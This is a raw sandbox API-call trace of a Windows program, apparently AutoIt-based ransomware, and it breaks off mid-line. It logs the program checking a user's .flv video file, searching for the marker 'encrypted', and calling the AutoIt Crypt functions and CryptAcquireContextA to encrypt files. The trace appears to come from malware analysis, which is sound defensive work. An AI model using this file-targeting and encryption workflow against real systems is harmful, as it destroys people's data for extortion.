[0043.133] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0043.133] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0043.134] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0043.134] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0043.134] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0043.134] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0043.134] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0043.134] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0043.134] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0043.134] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0043.134] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0043.134] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0043.134] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0043.134] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0043.134] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0043.134] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0043.134] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0043.134] FreeLibrary (hLibModule=0x76e10000) returned 1 [0043.134] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0043.134] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0043.134] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0043.134] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0043.134] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0043.134] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0043.134] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0043.134] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0043.134] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0043.134] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0043.134] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0043.134] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0043.134] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0043.134] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0043.135] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0043.135] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0043.135] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0043.135] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0043.135] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0043.135] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0043.135] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0043.135] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0043.135] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0043.135] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af438 [0043.135] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0043.135] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0043.135] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0043.135] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0043.135] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0043.135] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0043.135] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0043.135] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0043.135] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0043.135] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0043.135] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0043.135] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0043.135] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0043.135] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0043.135] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0043.135] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="flv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0043.135] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".flv", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0043.136] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0043.136] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0043.136] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0043.136] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0043.136] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0043.136] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0043.136] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0043.136] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x90) returned 0x7c38b0 [0043.136] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0043.136] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0043.136] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0043.136] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0043.136] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\ieBG H7.flv", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa4fbf200, ftCreationTime.dwHighDateTime=0x1d5c48f, ftLastAccessTime.dwLowDateTime=0x416a0950, ftLastAccessTime.dwHighDateTime=0x1d5c400, ftLastWriteTime.dwLowDateTime=0x416a0950, ftLastWriteTime.dwHighDateTime=0x1d5c400, nFileSizeHigh=0x0, nFileSizeLow=0x14e60, dwReserved0=0x0, dwReserved1=0x777648, cFileName="ieBG H7.flv", cAlternateFileName="IEBGH7~1.FLV")) returned 0x7c20c0 [0043.136] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0043.136] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0043.136] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\ieBG H7.flv", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa4fbf200, ftCreationTime.dwHighDateTime=0x1d5c48f, ftLastAccessTime.dwLowDateTime=0x416a0950, ftLastAccessTime.dwHighDateTime=0x1d5c400, ftLastWriteTime.dwLowDateTime=0x416a0950, ftLastWriteTime.dwHighDateTime=0x1d5c400, nFileSizeHigh=0x0, nFileSizeLow=0x14e60, dwReserved0=0x0, dwReserved1=0x777648, cFileName="ieBG H7.flv", cAlternateFileName="IEBGH7~1.FLV")) returned 0x7c20c0 [0043.136] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0043.136] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0043.137] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\ieBG H7.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.137] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\ieBG H7.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.137] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\ieBG H7.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.137] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\ieBG H7.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.137] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\ieBG H7.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.137] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\ieBG H7.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.137] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\ieBG H7.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.137] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\ieBG H7.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.137] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\ieBG H7.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.137] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\ieBG H7.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.137] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\ieBG H7.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.137] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\ieBG H7.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.137] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\ieBG H7.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.137] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\ieBG H7.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.137] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\ieBG H7.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.137] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\ieBG H7.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.137] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\ieBG H7.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.137] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\ieBG H7.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.137] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\ieBG H7.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.137] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\ieBG H7.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.137] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\ieBG H7.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.137] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\ieBG H7.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.137] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\ieBG H7.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.137] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Videos\\_mHpWJR_Yl93 b\\ieBG H7.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.137] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Videos\\_mHpWJR_Yl93 b\\ieBG H7.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.137] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Videos\\_mHpWJR_Yl93 b\\ieBG H7.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.137] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Videos\\_mHpWJR_Yl93 b\\ieBG H7.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.137] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Videos\\_mHpWJR_Yl93 b\\ieBG H7.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.137] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Videos\\_mHpWJR_Yl93 b\\ieBG H7.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.137] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Videos\\_mHpWJR_Yl93 b\\ieBG H7.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.137] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Videos\\_mHpWJR_Yl93 b\\ieBG H7.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.137] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Videos\\_mHpWJR_Yl93 b\\ieBG H7.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.138] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ideos\\_mHpWJR_Yl93 b\\ieBG H7.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.138] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="deos\\_mHpWJR_Yl93 b\\ieBG H7.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.138] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eos\\_mHpWJR_Yl93 b\\ieBG H7.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.138] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="os\\_mHpWJR_Yl93 b\\ieBG H7.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.138] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\_mHpWJR_Yl93 b\\ieBG H7.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.138] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\_mHpWJR_Yl93 b\\ieBG H7.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.138] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_mHpWJR_Yl93 b\\ieBG H7.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.138] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mHpWJR_Yl93 b\\ieBG H7.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.138] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HpWJR_Yl93 b\\ieBG H7.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.138] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pWJR_Yl93 b\\ieBG H7.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.138] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WJR_Yl93 b\\ieBG H7.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.138] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JR_Yl93 b\\ieBG H7.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.138] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="R_Yl93 b\\ieBG H7.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.138] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_Yl93 b\\ieBG H7.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.138] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Yl93 b\\ieBG H7.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.138] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="l93 b\\ieBG H7.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.138] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="93 b\\ieBG H7.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.138] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3 b\\ieBG H7.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.138] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" b\\ieBG H7.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.138] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="b\\ieBG H7.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.138] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\ieBG H7.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.138] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ieBG H7.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.138] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eBG H7.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.138] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BG H7.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.138] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="G H7.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.138] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0043.138] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0043.138] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0043.138] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0043.138] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0043.139] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0043.139] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="flv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0043.139] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".flv", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0043.139] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0043.139] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0043.139] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0043.139] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0043.139] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.139] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\ieBG H7.flv", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa4fbf200, ftCreationTime.dwHighDateTime=0x1d5c48f, ftLastAccessTime.dwLowDateTime=0x416a0950, ftLastAccessTime.dwHighDateTime=0x1d5c400, ftLastWriteTime.dwLowDateTime=0x416a0950, ftLastWriteTime.dwHighDateTime=0x1d5c400, nFileSizeHigh=0x0, nFileSizeLow=0x14e60, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="ieBG H7.flv", cAlternateFileName="IEBGH7~1.FLV")) returned 0x7c2100 [0043.139] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0043.139] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.139] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0043.139] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.139] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0043.139] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0043.139] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.139] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0043.140] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.140] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.140] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0043.140] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0043.140] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0043.140] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.140] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.140] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0043.140] PeekMessageW (in: lpMsg=0x6ae4c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae4c4) returned 0 [0043.140] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0043.140] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5bb8) returned 1 [0043.141] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.141] PeekMessageW (in: lpMsg=0x6aeb14, 